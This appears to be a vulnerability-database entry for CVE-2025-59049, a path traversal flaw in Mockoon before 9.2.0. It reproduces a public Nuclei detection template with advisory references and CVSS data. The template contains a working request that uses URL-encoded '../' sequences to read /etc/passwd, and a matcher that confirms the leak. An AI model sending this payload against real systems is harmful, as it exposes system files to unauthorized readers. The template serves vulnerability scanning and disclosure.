漏洞描述
Mockoon before 9.2.0 contains a path traversal and local file inclusion caused by unsafe templating of server filenames from user input, letting attackers read arbitrary files on the mock server filesystem, exploit requires crafted request.
CVE-2025-59049: Mockoon < 9.2.0 - Path Traversal
PoC代码[已公开]
id: CVE-2025-59049
info:
name: Mockoon < 9.2.0 - Path Traversal
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
Mockoon before 9.2.0 contains a path traversal and local file inclusion caused by unsafe templating of server filenames from user input, letting attackers read arbitrary files on the mock server filesystem, exploit requires crafted request.
reference:
- https://github.com/mockoon/mockoon/security/advisories/GHSA-w7f9-wqc4-3wxr
- https://github.com/mockoon/mockoon/commit/c7f6e23e87dc3b8cc44e5802af046200a797bd2e
- https://nvd.nist.gov/vuln/detail/CVE-2025-59049
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2025-59049
epss-score: 0.06224
epss-percentile: 0.90472
cwe-id: CWE-22
metadata:
verified: true
max-request: 1
vendor: mockoon
product: mockoon
tags: cve,cve2025,mockoon,lfi,path-traversal,vuln
variables:
static_dir: "static"
http:
- raw:
- |
GET /{{static_dir}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: {{Hostname}}
Accept: */*
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: content_type
words:
- "application/json"
# digest: 4a0a0047304502207ecd37316188a55455cc6598e8e6e8dd3f10fa96f68e754e713fc259e791b0ec022100b7b34a39cbc7f835747aa5457e01dda881dd9ad472c290cff3bc876e606802e0:922c64590222798bb761d5b6d8e72950